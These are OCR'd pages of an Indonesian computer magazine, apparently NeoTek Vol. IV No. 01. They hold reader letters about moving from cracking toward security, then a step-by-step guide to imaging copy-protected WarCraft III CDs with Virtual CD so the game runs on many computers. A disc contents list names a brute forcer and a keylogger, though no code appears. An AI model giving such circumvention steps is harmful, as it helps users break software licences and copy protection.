berdiskusi via e-mail dengan saudara Onno W Purbo selaku yang dipandang pakar Internet di Indonesia dan mengisi tulisan tentang hacking pertama kali di NeoTek. Saya sempat setuju jika strategi ini diambil untuk menggugah semangat rakyat (sebagian) bangsa ini untuk lebih dekat lagi dengan Teknologi Informasi global. Tapi, saya mulai melihat dampaknya tidak lagi indah. Kami kecoak elektronik memang perkumpulan grey hat; pada awalnya kami menggunakan filosofi yang sama. Tapi untuk saat sekarang ini, kami pikir sudah waktunya putar setir. Jangan lagi memberikan mereka konsumsi informasi teknis pembobolan, pencantolan dan lan... lan.. buruk lainnya. Kita berikan pemahaman yang benar tentang apa yang kita sampaikan; bukan hanya sebagai sebuah tulisan yang langsung bisa diterapkan tanpa dijiwai; sebab ini sudah menyangkut mentalitas bukan hanya hal teknis. Kami mengajak kepada rekan sekalian untuk kembali membumikan pemahaman hacking dengan benar. Kami yakin, kita sama-sama sudah paham apa itu hacking dan apa itu cracking, de el el. Semoga e-mail ini menjadi salah satu awal dari perubahan menuju yang lebih baik. Salam Hangat, - logC at Kecoak Elektronik Indonesia - Gerald at NightCrew Network https://www.kecoak.or.id https://sarang.kecoak.org http://www.MadLinux.or.id http://www.nightcrew.net (pro http://www.rubix3.net Open Source Leaders for Small Business©) LogC logC@kecoak.or.id J: Sent Oct 1 Terima kasih banyak buat masukannya... saya cc juga ke pak Kosasih Saya sendiri masih banyak hutang sebenarnya harusnya tulisantulisan untuk bertahan dan hacking dalam bentuk yang lebih positif lagi misalnya teknik socket programming dll bisa lebih di perbanyak Tentunya pak kosasih akan sangat berterima kasih kalau ada masukan artikel dari teman-teman di kecoak elektronik Onno W. Purbo onno@indo.net.id 44

Saatnya Putar Setir
J: Sent Oct 2 Halo pak Onno dan LogC, Dalam hal mendekatkan generasi muda ke teknologi informasi, NeoTek cukup berhasil. Memang untuk itu diberikan jalan yang sedikit menantang dan nakal. Komunitas neoteker yang berkembang pesat juga salah satu indikasinya. Kalau sekarang perlu putar setir, bukanlah karena yang terjadi itu salah, melainkan memang sudah saatnya melangkah ke fase berikutnya, yaitu meningkatkan kultur belajar yang bertanggung jawab. Saya setuju kalau artikelartikel NeoTek akan lebih ke arah security dan bukan cenderung ke cracking. Untuk itu artikel-artikel yang relevan sangat ditunggu baik dari pak Onno maupun LogC.
Kosasih Iskandarsjah kosasih@indo.net.id

J: Posted Oct 14 Cari ke link Arsip NeoTek. PDF yang dimuat baru sampai III/9 (3 nomor di belakang nomor edisi cetak yang sekarang III/12).
Kosasih Iskandarsjah kosasih_iskandarsjah@yahoo.com

Tutorial Komputer J: Posted Oct 13 Salam Neotekers semua... Teman2 semua, aku butuh tutorial network mulai dari basic sampai advancednya (bhs indonesia, dan versi pdf kalo bisa), buat temanku... Dimana yach, biar aku bisa download atau kalo temen2 ada teman boleh via japri aja, penting bgt lho..., emang rada besar kali yach size filenya. Thanks b4 untuk Neotekers semuanya.
Ade Eka Putra ade_ekaputra@yahoo.com

PDF NeoTek
T: Sent Oct 13 Kalo mau dl pdf neotek di neotekweb masuk dimana ya ?
Anarchy99 anarchy99@telkom.net

J: Posted Oct 13 coba cari di www.ilmukomputer.com
iko iko@infomedia.web.id

J: Posted Oct 14 www.neotek.co.id
syafii sapitenk@telkom.net

J: Posted Oct 13 http://www.bogor.net/idkf/
tslmg tslmg@lemigas.esdm.go.id

T: Sent Oct 14 Saya sudah masuk kesana tapi mau cari pdf majalah neotek ngak tahu yang mana, maksud saya pdf-nya yang satu majalah ngak pisah2. sama seperti pdf yang biasa di cd.
Anarchy99 anarchy99@telkom.net

NeoTek Vol. IV No. 01

NeoReview

MENGAKALI PERSYARATAN WARCRAFT III CD ROM Diganti CD Bohongan Saja
Melengkapi game WarCraft III: Reign of Chaos yang dimuat dalam CD NeoTek kali ini, dibahas juga cara menggandakan CD itu secara virtual dengan Virtual CD, sehingga anda bisa memainkan game itu tanpa harus selalu memasang CD ROM pada drive anda.

Virtual CD 5.0
Sebagai catatan, karena semua virtual CD ini menggunakan serial number yang sama, maka hanya bisa satu saja yang terhubung ke Battle.Net, serta tidak dapat bermain satu lawan yang lain dalam LAN

Instalasi Virtual CD 5.0
demo tidak akan terasa ada masalah, mengingat versi demo tersedia hanya dalam format file dan bukan suatu CD yang diproteksi. Tetapi begitu anda menggemari game ini dan memutuskan membelinya (harganya SGD49.90 dalam bentuk satu CD), masalah mulai timbul. Anda boleh saja menginstal game WarCraft III: Reign of Chaos di banyak komputer, tetapi pada setiap saat hanya bisa satu komputer yang dimainkan. Ini karena program akan memeriksa ada atau tidaknya CD ROM dalam CD drive anda sebelum program ini dijalankan. Juga tidak mudah meng-copy CD ROM ini sebab program CD burner anda akan Memulai Instalasi Virtual CD 5.0

K

ALAU HANYA MEMAINKAN VERSI

mengenali adanya pembatasan dan pengcopy-an CD akan dibatalkan. Masak harus beli dua CD? Kiranya masalah ini lazim terjadi juga pada banyak games jenis lain. Untungnya masalah ini bisa diatasi dengan Virtual CD v. 5.0 yang tersedia pada CD NeoTek kali ini atau bisa anda download dari
http://www.virtualcd-online.com/default_e.htm

Instalasi Single Version Demo
Yang anda instal adalah single version, demo, tetapi tidak usah khawatir karena akan berjalan dengan baik apabila sekedar untuk mem bentuk virtual CD untuk game Banyaknya virtual drive yang dapat dibentuk sangat banyak, tergantung sudah berapa huruf yang terpakai untuk real drive, sebab huruf drive pada Windows sampai Z. Sewaktu pembentukan virtual drive, Windows akan mengenali virtual drie sebagai layaknya drive sungguhan. Anda akan diminta me-restart

Dengan virtual CD, anda akan membentuk virtual drive pada komputer anda selain juga CD Image dari CD yang akan anda jalankan pada virtual drive. Praktis kini anda dapat memainkan game ini di banyak komputer sekaligus dan CD aslinya dapat anda simpan baik-baik.

1

INSTAL ENGLISH VERSION
Double click icon VCD503EG.exe yang terdapat pada CD NeoTek dan program setup akan diekstrak ke direktori C:\Program Files\Common Files\ Virtual CD v5_03 Setelah itu anda diminta memilih bahasa, pilih English dan klik OK.

2

INSTALLATION WIZARD
Setelah ekstraksi, baru program setup dijalankan yang dimulai dengan ditampilkannya welcome screen. Klik Next untuk melanjutkan.

3

LICENSE AGREEMENT
Seperti biasa anda harus menyetujui license agreement sebelum dapat melanjutkan proses instalasi. Tick pada I accept the license agreement dan klik Next untuk melanjutkan.

Vol. IV No. 01 NeoTek

45

NeoReview
Windows untuk menyelesaikan aplikasi, yang setelah restart, Windows akan meng-update device driver database-nya untuk mengakomodasi virtual drive yang baru kita buat. Selanjutnya adalah membentuk keping virtual CD ROM yang akan dimasukkan pada virtual CD drive. Perlu diingat bahwa semua keping CD ROM akan mempunyai serial number yang sama sehingga tetap tidak bisa untuk LAN gaming dan untuk mengakses online game tetap hanya dapat untuk satu komputer saja. Tapi kalau untuk single user, dapat dipasang di sebanyak komputer yang anda inginkan...

Virtual drive akan dikenali sebagai drive biasa oleh Windows dan di-assign huruf drive tersendiri.

4

CDDB SUPPORT
Sebenarnya untuk sekedar memainkan CD game, CDDB support untuk informasi audio CD tidak diperlukan. Jadi terserah anda apakah ingin menyertakannya. Kalau komputer tidak terhubung ke Internet, CDDB support tidak usah dipilih.

5

LOKASI INSTALASI
Virtual CD akan diinstalasi di folder C:\Program Files\VirtualCD v5\ dan anda dapat mengubah lokasi ini. Klik Next untuk melanjutkan.

6

SINGLE USER DEMO VERSION
Ada beberapa pilihan, karena hanya menginstal versi demo, hanya dua opsi pertama yang dapat dipilih: single user demo version atau network demo version. Kita pilih saja yang pertama dan klik Next untuk melanjutkan.

7

MEMILIH VIRTUAL DRIVE
Ada banyak virtual drive yang tersedia (available) untuk dibentuk, pada contoh mulai dari F sampai Z. Misalnya kita bentuk dua virtual drive F dan G untuk kelak dipasangkan image file dari dua game CD. Klik Next untuk melanjutkan.

8

INSTALASI SELESAI
Setelah proses pembentukan virtual drive serta dikenalinya virtual device ini oleh Windows (Windows juga akan meng-update device driver database-nya) maka proses instalasi selesai. Klik Finish dan instalasi pun selesai.

9

ADA DUA DEVICE BARU
Double click icon My Computer dan terlihat kini selain dari drivedrive real, terdapat pula dua virtual drive. Kini anda tinggal membentuk CD Image dari Game CD anda dan memasukkan CD Image itu pada virtual drive.

46

NeoTek Vol. IV No. 01

NeoReview

Membentuk CD Image & Menjalankannya
bentuk virtual CD drive adalah membentuk ‘keping’ virtual dari CD ROM yang akan dipakai pada virtual CD drive itu. Prinsipnya adalah membentuk image file dari CD ROM tersebut. Tidak heran kalau persyaratan minimumnya adalah tempat di hard disk paling tidak 700 Mbyte, sebab anda akan menyalin seluruh CD kedalam hard disk. Apabila akan ada masalah dalam meng-copy CD yang diproteksi akan menggunakan CD burning software,

T

AHAP BERIKUTNYA SETELAH MEM-

maka membentuk image file dengan Virtual CD 5,0 dapat lancar dilakukan walaupun CD ROM-nya dilengkapi dengan proteksi. Image file yang terbentuk dapat anda kelompokkan ke dalam kategori yang disediakan sehingga anda mempunyai virtual CD rack juga. Tentunya kalau anda mempunyai ruang hard disk yang melimpah. Bukankah sekarang hard disk 80 atau bahkan 120 Gbyte sudah sangat terjangkau harganya? Untuk ‘memasukkan’ keping CD virtual ini ke CD drive virtual, cukup

klik kanan pada CD drive virtual dan pilih menu v 5 - Insert a Virtual CD. Selanjutnya instalasi dapat dilakukan dari virtual CD ROM itu dan setelah itu game dapat dimainkan dan keping CD ROM virtual biarkan saja tidak usah dilepas dari CD drive virtualnya, kecuali apabila anda ingin mengganti game yang dimainkan. Pada WarCraft III, expansion set-nya The Frozen Throne juga memerlukan CD berada di drive agar dapat dimainkan. Jadi bisa buat image file juga untuk CD-nya.

CD Image membentuk virtual CD ROM untuk ‘dimasukkan’ pada virtual CD drive

1

FIRST STEP
Double click pada icon Virtual CD yang terbentuk di desktop. Karena kita baru pertama kali menjalankan Virtual CD, pilih opsi petama untuk membentuk virtual CD yang pertama. Klik Continue untuk melanjutkan.

2

INITIALIZING VIRTUAL CD
Akan terlihat proses Initializing Virtual CD Management yang dilanjutkan dengan tampilnya jendela registrasi yang meminta license code. Klik Cancel karena kita hanya akan menggunakan versi demo.

3

IMAGE WRITER
Selanjutnya program akan menampilkan Image Writer yang akan meminta kita memasukkan CD yang akan dibentuk imagenya kedalam CD ROM. Masukkan CD game yang dimaksud dan klik OK.

4

CD ANALYSIS DAN IMAGE WRITER
CD yang kita masukkan akan dianalisa. Tidak ada yang perlu kita uah di sini, cukup klik Finish dan proses pembentukan CD image akan berlangsung

5

CD IMAGE TERBENTUK
Terlihat CD Image dari WarCraft III telah terbentuk. Selanjutnya kembali buka My Computer dan klik kanan pada salah satu virtual drive lalu pilih v5 - Insert a virtual CD > WarCraft III dan kini CD Image sudah ‘masuk’ ke dalam virtual CD kita.

6

JALANKAN WARCRAFT
CD real sudah bisa anda angkat dari CD drive real dan kini buka virtual CD yang padanya sudah terdapat CD Image. Proses instalasi dan juga memainkan game akan berjalan seolah-olah dengan CD sungguhan.

Vol. IV No. 01 NeoTek

47

NeoReview

Bluetooth CD
Semakin banyak produk elektronika yang kini menyediakan fasilitas Bluetooth, yang memungkinkan berbagai jenis produk yang Bluetoothenabled berinteraksi satu sama lain. Pada mulanya aplikasi Bluetooth adalah untuk wireless headset pada handphone, namun kini sudah berkembang ke printer, scanner, handphone, PDA, dan juga untuk membentuk network dalam lingkup yang lebih kecil yang dikenal sebagai WPAN (wireless personal area network). Driver & Application Software CD Bluetooth yang disertakan dalam CD NeoTek kali ini menyediakan driver serta aplikasi (dalam Bluetooth disebut sebagai Bluetooth profile) untuk Bluetooth USB dongle, Bluetooth CF card, dan Bluetooth untuk Windows CE 3.0 dan PocketPC 2002. Untuk Bluetooth USB dongle disediakan versi 1.3.2.7, sedangkan untuk CF Bluetooth dan Windows CE/Pocket PC 2002 disediakan versi 1.3.1. Application Note Untuk lebih detailnya lagi,anda dapat mempelajari Bluetooth Readme yang berisi Application Note, yang dirinci lagi berdasarkan jenis produknya pada Application Note khusus. Cell Phone Local Area Network PDA Printer Acrobat Reader 5.0.5 Sebagian dokumen ada dalam format HTML dan akan membuka browser apabila anda memanggilnya dan sebagian lagi dalam format PDF. Untuk itu disediakan Acrobat Reader 5.0.5.

daftar isi cd neotek
BLUETOOTH
Bluetooth CD bsetup.exe Setup & using Bluetooth Env. Setting_Up_and_using_ Bluetooth_Testing_Env_v1_3.pdf

GAME

WarCraft III Demo

Warcraft3_Demo.zip mbhttpbf.exe mirc612.exe

HACKING/SECURITY
HTTP Brute Forcer

IRC

mIRC 6.1.2

LINUX

User Mode Linux UML Builder

user_mode_linux-2.4.19.5um-0.i386.tar.gz umlbuilder-1.40-5.i386.tar.gz motherboardvideo.zip

VIDEO

Motherboard Video

SYMBIAN OS

S60 MIDP SDK 1.2.1 Symbian nS60_jme_sdk_v1_2_1.zip Symbian OS 7 UIQ SDK uiq_sdk_r2.zip UIQ SDK Update uiqsdk_update_rc1.zip Symbian P800 Emulator symbian_p800_emulator.zip Symbian readme symbian_readme_r3.txt

VIDEO EDITING
VCDCutter 4.0.3

vcd403.zip CircleVirtualCD.exe VCD503EG.zip v5manualEN.zip deltree-mirc.txt

Symbian OS 7 U IQ SDK
Tool yang juga istimewa ukuran dan kelengkapannya adalah Symbian OS 7 UIQ SDK. Seperti sudah diketahui, UIQ adalah mode display yang digunakan dalam handphone seperti Sony Ericsson P800 yang menjalankan sistem operasi terbaru dari Symbian, yaitu Symbian 7. Kebanyakan handphone terbaru dari Nokia seperti Nokia 7650 dan Nokia 3650 baru menjalankan Symbian 6. Program yang dibuat untuk Symbian OS 7 ini, yang dikenal sebagai personal Java atau pJava, harus menggunakan Java SDK 1.3.x dan bukannya yang terbaru (1.4.x). Karena masalah tempat, pada CD NeoTek kali ini tidak disertakan Java 2 SDK 1.3.x. Anda dapat memperolehnya dari CD NeoTek III/11 yang membahas Wireless Java.

VIRTUAL CD

Circle Virtual CD XP Virtual CD 5.0 Virtual CD manual

PROYEK
Deltree

Keylogger 3

mirc-sll MyFirst TicTacToe

my_smtp.cpp my_smtp.h smtp.cpp smtp.dsp smtp.dsw ReadMe.txt mirc-sll.zip MyFirst.java TicTacToe.zip

smtp.opt smtp.plg StdAfx.cpp StdAfx.h smtp.ncb

48

NeoTek Vol. IV No. 01

NeoReview
C I RCLE V I RTU AL CD XP

pabila menggunakan Windows XP, selain dapat menggunakan Virtual CD 5.0, anda dapat juga menggunakan Circle Virtual CD. Berbeda dengan Virtual CD 5.0 yang dapat membentuk banyak virtual CD drive, maka pada Circle Virtual CD hanya terbentuk satu virtual drive dengan default letter Z. Menu pada Circle Virtual CD lebih sederhana dibandingkan pada Virtual CD 5.0 dan terdiri dari:

A

• Create CD Image (.HVD) • Insert CD Image (.HVD) • Configure • About • Eject • Close Penetapan drive letter dilakukan pada menu Configure, sedangkan menumenu lainnya sudah jelas dari namanya. Pada pembentukan CD image, program ini akan men-scan sector-sector pada CD original dan membentuk file .HVD; file

inilah yang kemudian dibaca sebagai keping CD ROM maya oleh drive Z yang juga maya. Pada contoh ditunjukkan pembentukan keping CD maya dari CD ROM original expansion set WarCraft III, yaitu The Frozen Throne. Seperti juga WarCraft III, cara ini hanya dapat untuk single player game atau untuk single access ke Battle.Net, mengingat semua keping CD maya ini mempunya serial number yang sama.

Iklan VisionNet

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->